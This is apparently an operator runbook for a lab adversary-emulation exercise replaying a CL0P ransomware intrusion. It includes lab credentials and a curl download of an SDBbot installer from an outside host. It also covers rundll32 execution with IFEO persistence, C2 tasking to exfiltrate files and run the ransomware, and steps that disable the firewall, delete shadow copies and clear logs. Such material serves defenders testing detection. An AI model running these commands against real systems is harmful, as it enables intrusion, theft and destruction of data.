# CL0P Scenario Overview

Legend of symbols:

• 💡 - callout notes
• ❗ - extremely important note
• ➡️ - Switching to another session
• ⭕ - Disconnect from RDP
• 🔴 - Sign out of RDP
• 📷 - take a screenshot
• 🕑 - Record timestamp
• 🔊 - Noise activity

• Initiate an RDP session to the Kali attack host corsair (223.246.0.70):

  IP	Username	Password
  223.246.0.70	op1	Subpar-Parabola

• In a new terminal window start the evalsC2server, ensuring the following handlers are enabled:

  • Simple File Server

  • SDBbot

    cd cl0p/Resources/control_server
    sudo go build -o controlServer main.go
    sudo ./controlServer -c config/cl0p.yml

    Password
    Subpar-Parabola

• Right-click within the terminal window and click "Split Terminal Horizontally". Within the new terminal, change directory to the location of the evalsC2client.py and use this terminal for tasking implants.

  cd cl0p/Resources/control_server

• ➡️ Initiate an RDP session to the Windows jumpbox spitfire (223.246.0.90)

• ➡️ From the Windows jumpbox spitfire (223.246.0.90), initiate an RDP session to the Windows victim workstation diagonalley (10.55.4.21) as encryptpotter.net\griphook:

  Hostname	Username	Password
  diagonalley.encryptpotter.net	encryptpotter.net\griphook	Feral-Studs

• Search for Command Prompt and execute the following command.

curl -o C:\Users\griphook\AppData\Roaming\IFInstaller.dll  http://curse-breaker.org/files/installer.dll

• Close the command prompt window.

The victim executes the downloaded SDBbot Installer (C:\Users\griphook\AppData\Roaming\IFInstaller.dll) using rundll32.exe.

The SDBbot Installer contains an embedded RAT payload and, on execution, writes shellcode and the embedded payload as a binary blob to the registry at HKLM\SOFTWARE\Microsoft\skw. Then, the installer establishes persistence using image file execution options injection:

• The SDBbot Installer saves the SDBbot Loader DLL to C:\Windows\temp\tmp8AB2.tmp and creates a symbolic link C:\Windows\System32\msverload.dll linking to the Loader DLL
• The SDBbot Installer adds msverload.dll to the VerifierDlls value for winlogon.exe

• In the RDP session to the Windows victim workstation diagonalley (10.55.4.21) as encryptpotter.net\griphook, search for Command Prompt and right-click to Run as Administrator.

• In the Admin Command Prompt, execute the SDBbot Installer using rundll32:

  rundll32.exe C:\Users\griphook\AppData\Roaming\IFInstaller.dll,install

• 📷 Confirm and screenshot that the payload was executed in Command Prompt.

The following noise activity is executed:

• User will execute rundll32.exe to load scripts with msedge
  • cmd.exe executed rundll32 url.dll,FileProtocolHandler https://www.google.com & taskkill /F /IM \"msedge.exe\" /T
• User will create text files using Notepad
  • notepad.exe creates C:\Users\Public\hidden.txt" & "C:\Users\Public\original.txt
• User will embed a text file within another text file
  • cmd.exe executed copy /b C:\\Users\\Public\\hidden.txt C:\\Users\\Public\\original.txt
• User will modify the IFEO registry for msedge
  • reg add \HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\msedge.exe\" /v Debugger /t REG_SZ /d \"C:\\ Program Files\\Mozilla Firefox\\firefox.exe\""

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Eventually encryptpotter.net\griphook logs back in to diagonalley (10.55.4.21), executing the image file execution options persistence mechanism.

The SDBbot Loader component reads the binary blob stored in the registry and executes the shellcode. The shellcode will load and execute the SDBbot RAT payload in memory. The SDBbot RAT establishes C2 communication over TCP port 443 and sends discovery output (domain name, computer name, country code, OS version, user privileges, whether proxy is configured).

• Return to your RDP session to diagonalley (10.55.4.21) as encryptpotter.net\griphook

• Sign out of the RDP session and sign back in to diagonalley (10.55.4.21) as encryptpotter.net\griphook

  Hostname	Username	Password
  diagonalley.encryptpotter.net	encryptpotter.net\griphook	Feral-Studs

• On the Desktop, open Inventory_gdlRyr.xls (opens in LibreOffice Calc)

• ➡️ Return to the Kali attack host corsair (223.246.0.70)

• 📷 Confirm and screenshot C2 registration of the SDBbot RAT

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

The attacker will then use SDBbot to discover and exfiltrate files of interest from the workstation.

• Task the SDBbot RAT to enumerate a user directory before exfiltrating files

  ./evalsC2client.py --set-task 0x0000000F '{"id":"execute", "arg":"dir C:\\users\\"}'

• Task the SDBbot RAT to exfiltrate files

  ./evalsC2client.py --set-task 0x0000000F '{"id":"read", "arg":"C:\\Users\\griphook\\Desktop\\Findings_reZGaJ.doc"}'

• 📷 Confirm and screenshot the successful file download from the C2 server output.

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

• ❗ Notify your Threat Hunter that you are starting execution of the Detections manual noise step

• ➡️ From the Windows jumpbox spitfire (223.246.0.90), watch the RDP session to the Windows victim workstation vault713 (10.55.3.100) as encryptpotter.net\ranrok. If GHOSTS is currently performing actions or in the middle of a timeline, wait for it to finish. Then click into the RDP session and you'll have a brief window to do the following.

• search for PowerShell and right-click to Run as Administrator

• Execute the following command to install 7zip to computers in the domain

Invoke-Command -ComputerName diagonalley,gobbledgook,vault713,azkaban,hangleton -ScriptBlock { choco install 7zip -y }

• ➡️ Minimize your RDP then From the Windows jumpbox spitfire (223.246.0.90), initiate an RDP session to the Windows victim workstation diagonalley (10.55.4.21) as encryptpotter.net\griphook if one does not already exist.

  Hostname	Username	Password
  diagonalley.encryptpotter.net	encryptpotter.net\griphook	Feral-Studs

• Open File Explorer then browse to Documents and create a new folder named xfer

• Drag all files in Documents into xfer

• Right-click the xfer folder > Show More Options > 7-ZIP > Add to Archive...

  • Use leakycauldron as the zip password

• Delete the original xfer folder

• Under �This PC�, open the share in a new File Explorer window and click into the mounted share Z:

• Drag the xfer.zip to the root of the network share

• Search for and open WordPad. Do not close the application.

• 🔴 Disconnect from the RDP to diagonalley (10.55.4.21)

• ➡️ From the Windows jumpbox spitfire (223.246.0.90), watch the RDP session to the Windows victim workstation gobbledgook (10.55.4.22). If GHOSTS is currently performing actions or in the middle of a timeline, wait for it to finish. Then click into the RDP session and you'll have a brief window to do the following.

• In a new File Explorer window, click "This PC" from the left menu

• Click on the mapped network drive Z:

• Copy the xfer.zip to Downloads

• Right-click the xfer folder > Show More Options > 7-ZIP > Extract Here then enter leakycauldron for the password

• Click out of the RDP window to gobbledgook (10.55.4.22) but leave it open and running so that GHOSTS can continue executing.

The attacker will then use SDBbot to ingress and execute the CL0P ransomware on diagonalley (10.55.4.21). On execution, CL0P will perform the following actions:

• Discover the keyboard layout to check the language and retrieve the font used by the system
• Delete shadow copies and resize shadow storage
• Disable boot recovery options
• Stop various services
• Stop various processes
• Enumerate logical drives and files
• Suppress error dialogues and encrypt files using AES, appending the .C_I0p extension to encrypted files
• Leave ransom notes in affected folders
• Clear Windows Event Logs
• Delete itself on completion

The following noise activity is executed:

• User will execute commands
  • cmd.exe executed systeminfo | findstr /B /C:'System Locale'
  • cmd.exe executed netsh advfirewall set allprofiles state off
• User will execute powershell commands
  • Get-WmiObject -Class Win32_Service | Where-Object {{}$_.State -eq \"Running\"{}} | Format-Table
  • Stop-Service -Name Bluetooth{TAB}
  • Stop-Service -Name BTAGService
  • Stop-Service -Name OneSync{TAB}
  • Stop-Service -Name XblGameSave
  • Stop-Service -Name WbioSrvc
  • Get-WinSystemLocale

• From the Kali attack host corsair (223.246.0.70), task the SDBbot RAT to ingress the CL0P executable

  ./evalsC2client.py --set-task 0x0000000F '{"id":"download", "payload":"main.exe", "arg":"C:\\Windows\\System32\\SysMonitor.exe"}'

• Task the SDBbot RAT to execute CL0P

  ./evalsC2client.py --set-task 0x0000000F '{"id":"execute", "arg":"C:\\Windows\\System32\\SysMonitor.exe"}'

• Allow 5-10 minutes for CL0P to finish running.

• 📷 Screenshot the result of CL0P execution from the C2 server output.

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps